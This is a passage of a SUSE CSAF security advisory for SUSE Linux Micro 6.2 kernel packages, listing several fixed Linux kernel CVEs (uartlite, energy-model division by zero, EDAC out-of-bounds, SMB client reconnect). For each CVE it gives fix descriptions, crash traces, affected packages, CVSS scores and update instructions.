8.209183] ? __irq_resolve_mapping+0x47/0x80\n[ 8.209187] ? exc_page_fault+0x64/0x140\n[ 8.209190] ? asm_exc_page_fault+0x22/0x30\n[ 8.209196] ? mutex_lock+0x19/0x30\n[ 8.223116] uart_add_one_port+0x60/0x440\n[ 8.223122] ? proc_tty_register_driver+0x43/0x50\n[ 8.223126] ? tty_register_driver+0x1ca/0x1e0\n[ 8.246250] ulite_probe+0x357/0x4b0 [uartlite]\n\nTo prevent it, move uart driver registration in to init function. This\nwill ensure that uart_driver is always registered when probe function\nis called.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38262",
"url": "https://www.suse.com/security/cve/CVE-2025-38262"
},
{
"category": "external",
"summary": "SUSE Bug 1246282 for CVE-2025-38262",
"url": "https://bugzilla.suse.com/1246282"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-38262"
},
{
"cve": "CVE-2025-38297",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38297"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nPM: EM: Fix potential division-by-zero error in em_compute_costs()\n\nWhen the device is of a non-CPU type, table[i].performance won\u0027t be\ninitialized in the previous em_init_performance(), resulting in division\nby zero when calculating costs in em_compute_costs().\n\nSince the \u0027cost\u0027 algorithm is only used for EAS energy efficiency\ncalculations and is currently not utilized by other device drivers, we\nshould add the _is_cpu_device(dev) check to prevent this division-by-zero\nissue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38297",
"url": "https://www.suse.com/security/cve/CVE-2025-38297"
},
{
"category": "external",
"summary": "SUSE Bug 1253078 for CVE-2025-38297",
"url": "https://bugzilla.suse.com/1253078"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-38297"
},
{
"cve": "CVE-2025-38298",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38298"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nEDAC/skx_common: Fix general protection fault\n\nAfter loading i10nm_edac (which automatically loads skx_edac_common), if\nunload only i10nm_edac, then reload it and perform error injection testing,\na general protection fault may occur:\n\n mce: [Hardware Error]: Machine check events logged\n Oops: general protection fault ...\n ...\n Workqueue: events mce_gen_pool_process\n RIP: 0010:string+0x53/0xe0\n ...\n Call Trace:\n \u003cTASK\u003e\n ? die_addr+0x37/0x90\n ? exc_general_protection+0x1e7/0x3f0\n ? asm_exc_general_protection+0x26/0x30\n ? string+0x53/0xe0\n vsnprintf+0x23e/0x4c0\n snprintf+0x4d/0x70\n skx_adxl_decode+0x16a/0x330 [skx_edac_common]\n skx_mce_check_error.part.0+0xf8/0x220 [skx_edac_common]\n skx_mce_check_error+0x17/0x20 [skx_edac_common]\n ...\n\nThe issue arose was because the variable \u0027adxl_component_count\u0027 (inside\nskx_edac_common), which counts the ADXL components, was not reset. During\nthe reloading of i10nm_edac, the count was incremented by the actual number\nof ADXL components again, resulting in a count that was double the real\nnumber of ADXL components. This led to an out-of-bounds reference to the\nADXL component array, causing the general protection fault above.\n\nFix this issue by resetting the \u0027adxl_component_count\u0027 in adxl_put(),\nwhich is called during the unloading of {skx,i10nm}_edac.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38298",
"url": "https://www.suse.com/security/cve/CVE-2025-38298"
},
{
"category": "external",
"summary": "SUSE Bug 1253079 for CVE-2025-38298",
"url": "https://bugzilla.suse.com/1253079"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "important"
}
],
"title": "CVE-2025-38298"
},
{
"cve": "CVE-2025-38379",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38379"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb: client: fix warning when reconnecting channel\n\nWhen reconnecting a channel in smb2_reconnect_server(), a dummy tcon\nis passed down to smb2_reconnect() with -\u003equery_interface\nuninitialized, so we can\u0027t call queue_delayed_work() on it.\n\nFix the following warning by ensuring that we\u0027re queueing the delayed\nworker from correct tcon.\n\nWARNING: CPU: 4 PID: 1126 at kernel/workqueue.c:2498 __queue_delayed_work+0x1d2/0x200\nModules linked in: cifs cifs_arc4 nls_ucs2_utils cifs_md4 [last unloaded: cifs]\nCPU: 4 UID: 0 PID: 1126 Comm: kworker/4:0 Not tainted 6.16.0-rc3 #5 PREEMPT(voluntary)\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-4.fc42 04/01/2014\nWorkqueue: cifsiod smb2_reconnect_server [cifs]\nRIP: 0010:__queue_delayed_work+0x1d2/0x200\nCode: 41 5e 41 5f e9 7f ee ff ff 90 0f 0b 90 e9 5d ff ff ff bf 02 00\n00 00 e8 6c f3 07 00 89 c3 eb bd 90 0f 0b 90 e9 57 f\u003e 0b 90 e9 65 fe\nff ff 90 0f 0b 90 e9 72 fe ff ff 90 0f 0b 90 e9\nRSP: 0018:ffffc900014afad8 EFLAGS: 00010003\nRAX: 0000000000000000 RBX: ffff888124d99988 RCX: ffffffff81399cc1\nRDX: dffffc0000000000 RSI: ffff888114326e00 RDI: ffff888124d999f0\nRBP: 000000000000ea60 R08: 0000000000000001 R09: ffffed10249b3331\nR10: ffff888124d9998f R11: 0000000000000004 R12: 0000000000000040\nR13: ffff888114326e00 R14: ffff888124d999d8 R15: ffff888114939020\nFS: 0000000000000000(0000) GS:ffff88829f7fe000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00007ffe7a2b4038 CR3: 0000000120a6f000 CR4: 0000000000750ef0\nPKRU: 55555554\nCall Trace:\n \u003cTASK\u003e\n queue_delayed_work_on+0xb4/0xc0\n smb2_reconnect+0xb22/0xf50 [cifs]\n smb2_reconnect_server+0x413/0xd40 [cifs]\n ? __pfx_smb2_reconnect_server+0x10/0x10 [cifs]\n ? local_clock_noinstr+0xd/0xd0\n ? local_clock+0x15/0x30\n ? 